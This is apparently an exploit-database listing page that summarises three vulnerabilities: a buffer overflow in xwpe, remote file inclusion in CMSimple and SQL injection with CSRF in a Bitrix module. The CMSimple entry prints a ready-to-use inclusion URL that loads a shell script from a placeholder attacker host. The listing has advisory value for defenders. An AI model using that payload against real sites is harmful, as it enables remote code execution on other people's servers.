header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

xwpe – Windows Editor v1.5.30a-2.1 Stack-based Buffer Overflow

xwpe v1.5.30a-2.1 and prior versions are prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Multiple vulnerabilities in CMSimple

An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.

mcart.xls Bitrix module SQL Injection Vulnerability

Multiple SQL Injection vulnerabilities in mcart.xls Bitrix module can be exploited to execute arbitrary SQL queries, obtain sensitive data, modify information in the database, and gain complete control over the vulnerable website. The vulnerabilities require the attacker to be authorized against the website and have access to the vulnerable module. However, the vulnerabilities can also be exploited via CSRF vector if the web application does not check the origin of received requests. This allows a remote anonymous attacker to create a page with a CSRF exploit, trick the victim into visiting this page, and execute arbitrary SQL queries in the database of the vulnerable website.

Recent Exploits: